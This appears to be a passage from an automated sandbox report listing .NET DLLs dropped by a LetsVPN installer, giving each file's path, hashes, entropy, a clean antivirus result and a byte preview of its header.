                                                                                                                                                                                                  SSDEEP:768:A0w2j7R3d4Q5ENmiL31SAAh1OSxJJssUJIJd4l4Trq3b2KZBZ8wS+ST6nkic3:VLAAh1OSxJJssUJIJal4T23qK5/ml
                                                                                                                                                                                                  MD5:E9BD7AFF9F7F4CE19A15A417937A179B
                                                                                                                                                                                                  SHA1:5189A5770C94648914EC9A44C2C76327291D04B0
                                                                                                                                                                                                  SHA-256:E95310BCE625924484DBD4165C7C0552F01BC6BC0CC6C03A65FB4C40E78D8A09
                                                                                                                                                                                                  SHA-512:D8B21999D1BE9B314962EB14FD37A2CD90661BAFD7974F8B5A25524101CF606C9A72B7BDF59004FD8D5B210CED0F1D130300374AB288ABF38CB95F9F68DCE2E1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g..........." ..0..*...........H... ...`....... ..............................i.....@..................................G..O....`..|............4.. ............F..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...|....`.......,..............@..@.reloc...............2..............@..B.................G......H.......8)...............................................................0..:.......s.......}......}......}......}...........s.....{....(...+*...0..:.......s.......}......}......}......}...........s.....{....(...+*...0..:.......s.......} .....}!.....}".....}#......$...s.....{ ...(...+*...0..:.......s%......}&.....}'.....}(.....})......*...s+....{&...(,...*...0..B.......s-.......}......}/.....}0.....}1.....}2......3...s+....{....(,...*F...(...+...(...+*.0..B.......s5.......}6.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.876326631146695
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:d6x4ushqWOHlLf2KQcvBZ9RQa/S+ShjmM6IGBkSZL:dEkq3b2KZBZdS+ST6nkwL
                                                                                                                                                                                                  MD5:C293FE3E2A6D35F139E4992D2E92CB90
                                                                                                                                                                                                  SHA1:65207323C9494A1A07677FCD8444E3A32A8D4D79
                                                                                                                                                                                                  SHA-256:2223DB72D86A4409E1960FFA326DD54FA652EE6F9AFCAA1B2E162E637CAF6228
                                                                                                                                                                                                  SHA-512:ED363E16C85CAF716BBF206D2A487ABEA22FE63CC688CDAE9DAB25B4DB21884FF06196659E5D51B29A351DEF35C4EB24937765B685DDCBD1D5A8FE2DFA1D2BA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............,... ...@....... ....................................@..................................+..O....@..X............... ....`.......*..T............................................ ............... ..H............text........ ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................+......H........ ..<...................(*.......................................(....*..0...............(....o........(....s....*...0............(.......(....s....(....*2r...p.(....*:.(......}....*...0...........{.......(....,..*~....*BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID.......p...#Blob...........W..........3..........................................................9.........[...............................c.....c...{.c...>.c.....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58400
                                                                                                                                                                                                  Entropy (8bit):6.315564723596698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:O0GhwEvUmz5IR5tUe9CiXmEkzKeGIsNif11gNsNj8cIjqabZq3b2KZBZwS+ST6nD:MlIR56kCckz2DhiNIchab83qKu/mv8
                                                                                                                                                                                                  MD5:24E728F20D4174E87326141D124D6EEB
                                                                                                                                                                                                  SHA1:65CF7259921B5AAB0CB2CC0BA21A5FE69641C200
                                                                                                                                                                                                  SHA-256:D2D177DDB348675BF28E24C1D5F8925E3BD96AF5365F7E43EACA425F831CAA8C
                                                                                                                                                                                                  SHA-512:6D8B9758AB349AEF0BDAFC645193D50E34B83876BE04A71B96C8D2FEA55FEE2F5E1F243ACBD83AE7A452D7B5A3919E3A9ED416264B188D95B852610604F7919C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d............" ..0.............B.... ........... ....................... ............@.....................................O.......(............... ...............T............................................ ............... ..H............text...H.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................".......H........=.....................t.........................................(....*..(....*..(....*.......*Z~....,.*.o*...&......*.......*b~....-.r...ps....z~....*.(#...o ...*.0..........(#......o!.....(....Q*6.(.....(%...*.0..........(#........o".....(....Q*R.(.......(....('...*:(#......o'...*N.(.....(.....()...*2(#....o#...*2(#....o$...*..o....*..o....*2(#....o%...*2(#....o&...*6(#.....ok...*...0..........s.......}.....{....-...+........s.......(1...*6(#.....ol...*6..(....(3..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.748166697087464
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:daX0gijditBKMBRBHsEQ5hqWOHlLf2KQcvBZ9EpS+ShjmM6IGBkSQ:dakVRiBB83q3b2KZBZIS+ST6nkb
                                                                                                                                                                                                  MD5:08602BC21315B25E97D7E96D8FC2387F
                                                                                                                                                                                                  SHA1:84C18D3E3022FC445F15F4D589A9B9EF64B4CD6B
                                                                                                                                                                                                  SHA-256:48E07F638344EADF87BC216512464EEB05FD5359292F46ADB8F3F8B801A052FB
                                                                                                                                                                                                  SHA-512:7EDC2C8228D54C83D668D5EC9CE525976D9CC4590D7E53C3BC029AE92158A33AEC725C3A5221E5EFBFA3874F3F79918B02F48AB2BD2660B97B24C29B96F88787
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D............" ..0..............:... ...@....... ..............................a`....@.................................X:..O....@..d............&.. ....`......L9..T............................................ ............... ..H............text........ ...................... ..`.rsrc...d....@......................@..@.reloc.......`.......$..............@..B.................:......H........%.......................8.......................................0..K..........~....%-.&~..........s....%.....(....%~....(....,.r...p.r...p(....s....z*..0..#.......(......-...(....*..3...(....*s....z...(....%~....(....,.r)..p.r...p(....s....z*..0..#.......(......-..(....&*..3..(....&*s....z..0..7..........~....%-.&~..........s....%.....(.........~....(....*..0............(.........~....(....*..E................+$r9..p.(....*rI..p.(....*rc..p.(....*s....z...0..........

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):68640
                                                                                                                                                                                                  Entropy (8bit):6.075654477750361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Q2UTGlel80eXSfnUnM6sbwXN083qK/D/mT:hlel80eXcU+8n/U
                                                                                                                                                                                                  MD5:C7D493A5DCE0B2C4ECD8EAAB05FEA36D
                                                                                                                                                                                                  SHA1:E139EEC48C6927936E54F4D1F97699448A7E0692
                                                                                                                                                                                                  SHA-256:745A04AFCCC281E483C15F2677AA0FF5D25194C624C293DA9513B0361E6DF50B
                                                                                                                                                                                                  SHA-512:42D8CD32B54AEBCB811496448632F75F2C1BB339536D106B9A809D076CFBD9BFF2DF908BC49E57329BC66099C9975EDE27BEDDE03574F26B2DC576FC0BC6A9EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0.................. ........... .......................@............@.................................R...O....................... .... ......4...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......dB..P...........................................................6.......(....*.~....*F~H......on......*N........s....o...+*..0............(........~......o....*.0............(........~I.....or...*.0..%.........(..........(........~J.......ov...*....0..H.........(..........(........~K....oz............(....(.........{........o....*2~#....o....*2~"....o....*2~F....of...*6~G.....oj...*:~H......on...*2~$....o....*2~%....o....*>.(.......o....*...0..N........,........s.....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):110112
                                                                                                                                                                                                  Entropy (8bit):6.152337090409948
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:Yc6dvOJgPj92wqhe2CfvegBPLl86bqagz/i:MKYZTeu
                                                                                                                                                                                                  MD5:A350BD4DA0FE0F225C2EE57A7ADC974C
                                                                                                                                                                                                  SHA1:11B3FCD8D9E2667170845B25CBBFCEB9A5E6ADAC
                                                                                                                                                                                                  SHA-256:D498B2869289EC7D1D5F803B1ED303254F84F9CD0BFCEE98CCA4C903CCB46D42
                                                                                                                                                                                                  SHA-512:6055BF4F094DCFD0554EF4DF25BA774B0FC1A72C7CF045718E25A28C9D3EA10D198AA8FB478E332BB73A96E1245841B4F3A35A49C2FDA555ABB11F607EBA84A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q*..........." ..0..x..........^.... ........... ..............................(.....`.....................................O....................... ...........|...8............................................ ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B................@.......H...........8............................................................{....*..{....*V.(......}......}....*...0..;........u......,/(.....{.....{....o....,.(.....{.....{....o....*.*. Q... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*.0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*"..}....*..(.....-..rK..p(....*..rY..p(....(....*..0...........#........W~.........~...%.....( ...o!......?........Xo"......X.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):465952
                                                                                                                                                                                                  Entropy (8bit):6.223512663085733
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VcGv7iCPwqEYosfdBtmXaxWoXY06nQk2zLRC+oRZkR4CDy2sqIT0czXDU:x+CoCoCBtmXWnL6nd2ZiUR4WylT0qA
                                                                                                                                                                                                  MD5:944E14779C3757DCB53332A71F2E5ADD
                                                                                                                                                                                                  SHA1:F1F8AED8C6C4BD4E49E5ED2BBF5D2E44B8CB2416
                                                                                                                                                                                                  SHA-256:15C8E0EBC6B5CDFABFE66B535B21F128302243DED742FAC17CB6B4876F39BBBD
                                                                                                                                                                                                  SHA-512:7DB016F3ADE6AF48900B475D31AF9589D95773CC90363FB7366AC5FAEAE7330DE65C25DCE46707A73FE960830EE99112CA3FA7E7EF1CCB972D90FC4DDA2B9E83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._]..........." ..0.............v.... ... ....... .......................`......e.....`.................................$...O.... .................. ....@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................X.......H........f..D[............................................................(G...*"..(H...*&...(I...*..(....*"..(....*&...(....*r.,.~......~...... ...._X.*.*n.,.~.....~...... ...._X.*.*R..2.~.... .....X.*.*F..2.~.....h.X.*.*R..2.~.... .....X.*.*R..2.~.... .....X.*.*.0..A.........{.......a}......{.......a}......{.......a}......{.......a}....*....0..(..........?_d....1...n_....{.....Y.?_b`.{...._*.0..@..........{.......(....}.......{.......(....}.......{.......(....}....*.0..5...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):279072
                                                                                                                                                                                                  Entropy (8bit):6.057160854647767
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:abwZzM/arIPizbgQtYYYncnWDOsksHgtBwsbe+/uSO+:ZzM/arIPizxUncQfZHe
                                                                                                                                                                                                  MD5:0C61C76A9B8AF9ADF445838644CF9E3E
                                                                                                                                                                                                  SHA1:0E53E56F6461FB51AC598B0E09646F9BFC840B16
                                                                                                                                                                                                  SHA-256:F15F93D9EFDF561F15CAC6AF006AA1A088E28D41A7499AE62551C4A4B6A2CF85
                                                                                                                                                                                                  SHA-512:75AD643B9FD579856DA7913C554FEFA72526F6B9C1172E7BDBFC58BDB1985DE9C82A5284E36040BA26AD30E606978FDAB36959D5501DC623316997576B101F12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............*... ...@....... ....................................`.................................e*..O....@.................. ....`......x)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......X... .............................................................{0...*..{1...*V.(2.....}0.....}1...*...0..;........u......,/(3....{0....{0...o4...,.(5....{1....{1...o6...*.*. ... )UU.Z(3....{0...o7...X )UU.Z(5....{1...o8...X*.0..b........r...p......%..{0......%q.........-.&.+.......o9....%..{1......%q.........-.&.+.......o9....(:...*V!..../c...s;........*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(2...*..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):53792
                                                                                                                                                                                                  Entropy (8bit):6.218859181017788
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DDGXmBiXanx+zehk/WpB/yO0yW3qKm/mT:DDGXmBiXMhkOH/yO9WK/Y
                                                                                                                                                                                                  MD5:A348A1D502F3C891C1F42B43B9F4FE80
                                                                                                                                                                                                  SHA1:C080826E2D494DBA660B58F2AAC564325908624C
                                                                                                                                                                                                  SHA-256:C2B259C89D33CDCE77C235865C59BABD8D19C0D81AF94FA4EB450CC317656303
                                                                                                                                                                                                  SHA-512:F4584975AB126780D0EA42352F9327DB639C5F2A7DA0062811C0DBE7ADFF77C15B37C54FCF68A7B4A6FBA7DFC65423734FDC395B87509D9ED063236D098664F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h@qZ.........." ..0.............~.... ........... ..............................g.....`.................................*...O....................... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................^.......H........O...g..................(.......................................&...(....*6.......(....*:........(....*...~....%-.&~..........s....%.....(....*..0..@........(....s.......o......}.....s....}.....{......i.....o......}....*.0..............(.....`,.....*...0..Q.........R.{....u......o......{ .......i2...R.*..{.......*.| .....X.(!.......*.........*....0..............("....`,.....*...0............R.{....u......o......{ .....o#......X......i1...R.*..{.......*.| ......(!.....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.919726757848139
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ADNxWQFWkhqWOHlLf2KQcvBZ9i29XS+ShjmM6IGBkSg:ADNVvq3b2KZBZ7NS+ST6nkr
                                                                                                                                                                                                  MD5:12B94E7812C697C6EFC47CA203ACAF43
                                                                                                                                                                                                  SHA1:297127456EEE356A6D9471FED7AD3901E5D8E9D4
                                                                                                                                                                                                  SHA-256:D6BD67AC706FFC9E6AF619A38435ACAF4E9B218A8916BC6594CE5E878E3EB148
                                                                                                                                                                                                  SHA-512:136440711FB736ABB42029F5D2C42AFF486D5DFADB50FF7C9F7ED5E3BB9A5B44D0FBCD12E1079B520557A95FBA39E2E23A0FF07A11622971045F59340C538FDB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0.............f(... ...@....... ...............................&....@..................................(..O....@.................. ....`.......&............................................... ............... ..H............text...l.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................H(......H.......P ......................\&......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23584
                                                                                                                                                                                                  Entropy (8bit):6.770204264572881
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:grMdp9yXOfPfAxR5zwWvYW8ashqWOHlLf2KQcvBZ95c5S+ShjmM6IGBkS0xYm:grMcXP6Pq3b2KZBZgS+ST6nkBxYm
                                                                                                                                                                                                  MD5:D93FEE543469096A52E7A2C6C387BC11
                                                                                                                                                                                                  SHA1:AB0B4E8FB20AE717AD52BB06B77403FAD5B478AE
                                                                                                                                                                                                  SHA-256:F29862B3DFCD861EE5942607AF138F0AA389C12BD29C0C6B9A4B45F363A7118A
                                                                                                                                                                                                  SHA-512:047290C6236FD56A6F10D801DD2CD83E4EDA69FCE82F6FD814713140ECC0ED99048D31526D157DEB4304BA29BC93FA6EA245998D42D7ACCB4D5B524E3580E8BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ...............................!....@..................................B..O....`..@............... ............A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30752
                                                                                                                                                                                                  Entropy (8bit):6.38982790597927
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wgXxtu5jEIYDhzZpmaq3b2KZBZGS+ST6nkt:wgxt2YDh1pm13qK0/mT
                                                                                                                                                                                                  MD5:ADA23DADD0F2DFC00C48BA3B598F7F0E
                                                                                                                                                                                                  SHA1:EF20B60E66303AB86DCF5D2BC4EA47A425918CAF
                                                                                                                                                                                                  SHA-256:FD1DEFE276BD27F4EE1795972A00ADEED2AB08FF7DF4AAF0A10602C271B847FB
                                                                                                                                                                                                  SHA-512:9E6155AE8BD8E09060442DBDE5EA43331ED7E75D5CF85A74FA333F168F464767E589FBB8065CD74D56C8A2FD1671FB6308E1DF0C587373D32F5C0618FE4B299A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dP'..........." ..0..>..........*\... ...`....... ..............................b.....`..................................[..O....`...............J.. ............[..T............................................ ............... ..H............text...0<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............H..............@..B.................\......H........#...)...........L.......Z.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.010043403341069
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Jm2igOWnW8rWxhqWOHlLf2KQcvBZ95WaS+ShjmM6IGBkSu7Vj:5tCq3b2KZBZLS+ST6nkxVj
                                                                                                                                                                                                  MD5:9DF1738B2AADE4A06E42F8C82D9A5805
                                                                                                                                                                                                  SHA1:D1BE1D4029E07F0DC39D36F4ECDC7A866AE84FDE
                                                                                                                                                                                                  SHA-256:F7CA06EE9ED296CE61E20ADC9589F5AC2008F382339F3F6D5E763F04E9104027
                                                                                                                                                                                                  SHA-512:F4EA572C90FFDDC7A5F9F76887642BB0473982493253AE9DEB5900BC4870179EF4398FE8BE9C7DD6919B939FAF66C3AB1031B08A75E2DEE2FBFF48BA8CB6EFAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ....................................@.................................t)..O....@..D............... ....`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................n.o.....o.....\...........8...3.8...P.8.....8.....8.....8.....8.....8.....1.....8.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.999966721912843
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:enapn1iwwPWcGWHhqWOHlLf2KQcvBZ9ncIS+ShjmM6IGBkS3+:dDupq3b2KZBZuIS+ST6nkA+
                                                                                                                                                                                                  MD5:C724C97C789F51428C7CB5005DFD7FC1
                                                                                                                                                                                                  SHA1:69BF55DDB676112F3F5ABEF38AB997BA4ABE1458
                                                                                                                                                                                                  SHA-256:C3D214484B63E040DE737A4B065A87E3B2DB6072DFA7EDE28F4DDE633C5C09A9
                                                                                                                                                                                                  SHA-512:6765D6F3E4A81B522512C35D9B5DFE9B96552D90E6D7C871E0A0F46E5A309C568CB815B3E92649BB0723233CA629B0A8DA00F0D43BC4007FF51EE30F2C496A47
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................u.....@.................................p)..O....@..@............... ....`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....<.......#US.@.......#GUID...P.......#Blob......................3................................................F.o.....o.....\...........,.....,...(.,.....,...f.,.....,.....,.....,.....%.....,.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.005775503871292
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PHLaEav5aaUa6arWVLWKhqWOHlLf2KQcvBZ9V0S+ShjmM6IGBkSE:+Pv5t/NOTq3b2KZBZcS+ST6nkT
                                                                                                                                                                                                  MD5:DA4200A72DBFE725B71564C24FE16C08
                                                                                                                                                                                                  SHA1:C3CEBDBC20FDB2F941E88809F501255C6312362F
                                                                                                                                                                                                  SHA-256:36573488F5BA2D791A14775E9781DF5FB628F4262887757297874720C281E9B8
